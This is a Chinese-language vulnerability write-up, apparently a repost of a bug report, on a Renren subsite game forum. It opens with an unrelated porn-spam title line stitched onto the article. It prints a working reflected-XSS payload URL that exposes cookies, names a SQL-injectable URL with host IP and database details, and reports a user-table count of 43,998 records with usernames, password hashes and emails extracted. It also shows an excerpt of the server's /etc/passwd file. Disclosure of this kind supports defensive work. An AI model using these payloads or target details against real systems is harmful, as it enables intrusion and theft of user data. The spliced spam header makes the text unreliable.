自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

人人網(wǎng)分站SQL注入+反射型xss

安全 數(shù)據(jù)安全
在人人某bbs,反射型跨站,可獲取cookie。在sql注入時(shí)有多個(gè)注入點(diǎn),information_schema.columns可用,注入很方便。

 1.人人某bbs。

2.反射型跨站,可獲取cookie。

3.sql注入,多個(gè)注入點(diǎn),information_schema.columns可用,注入很方便。

4.很多個(gè)數(shù)據(jù)表,select count(*) from XXX_用戶表,結(jié)果:43998。

5.可讀取系統(tǒng)文件,例如/etc/passwd(其他的路徑?jīng)]找到)。

起因是發(fā)現(xiàn)人人網(wǎng)某分站的phpinfo()(這個(gè)沒有找到其他什么)

http://yxzb4.renren.com/index.php

結(jié)果發(fā)現(xiàn),wooyun里面有提交了的,只是沒處理。

http://www.wooyun.org/bugs/wooyun-2010-07040

結(jié)果偶然間,爬行到另外一個(gè)站,是一個(gè)游戲論壇。

http://yxzb.renren.com/bbs/

發(fā)現(xiàn)存在反射型xss,可獲取cookie

http://yxzb.renren.com/bbs/viewthread.jsp

?extra=<script>document.write(document.cookie)</script>

&tid=9525

人人網(wǎng)分站SQL注入+反射型xss

其中幾個(gè)頁面都存在注入,其中一個(gè)注入信息:

Target:  http://yxzb.renren.com/bbs/faq.jsp?action=message&id=24

Host IP: 111.1.20.155

Web Server:  Apache-Coyote/1.1

DB Server:  MySQL >=5

Current DB:  jsprun

可查看系統(tǒng)信息:

人人網(wǎng)分站SQL注入+反射型xss

注入的信息:

好多個(gè)數(shù)據(jù)庫:

人人網(wǎng)分站SQL注入+反射型xss

執(zhí)行查詢語句,查詢用戶,43998(網(wǎng)站上顯示信息:主題: 31695, 帖子: 304040, 會員: 43998)

select count(*) from  jrun_members

人人網(wǎng)分站SQL注入+反射型xss

用戶名,密碼,郵箱,salt....

人人網(wǎng)分站SQL注入+反射型xss

讀取/etc/passwd

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

...略

未測試是否可以拿到shell

責(zé)任編輯:藍(lán)雨淚 來源: 2cto
相關(guān)推薦

2013-11-14 10:27:54

2019-03-25 07:27:14

XSS漏洞Ecshop

2019-02-25 09:20:53

2024-10-12 10:57:21

2013-10-02 17:56:55

蘇寧易購SA權(quán)限SQL注入

2019-09-17 10:06:46

數(shù)據(jù)庫程序員網(wǎng)絡(luò)安全

2023-03-10 19:36:47

2010-09-09 17:22:14

2011-12-08 14:09:07

2015-10-26 16:01:15

2011-12-13 14:15:30

2011-12-08 16:18:40

2013-11-27 17:12:27

2011-12-13 13:54:42

2012-11-14 17:18:58

2013-09-03 10:10:00

人人網(wǎng)移動(dòng)開發(fā)架構(gòu)

2013-09-03 10:22:02

人人網(wǎng)移動(dòng)開發(fā)架構(gòu)

2010-12-20 16:04:30

2013-01-05 14:51:34

JavaScriptjQuery面試

2011-07-21 09:25:41

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號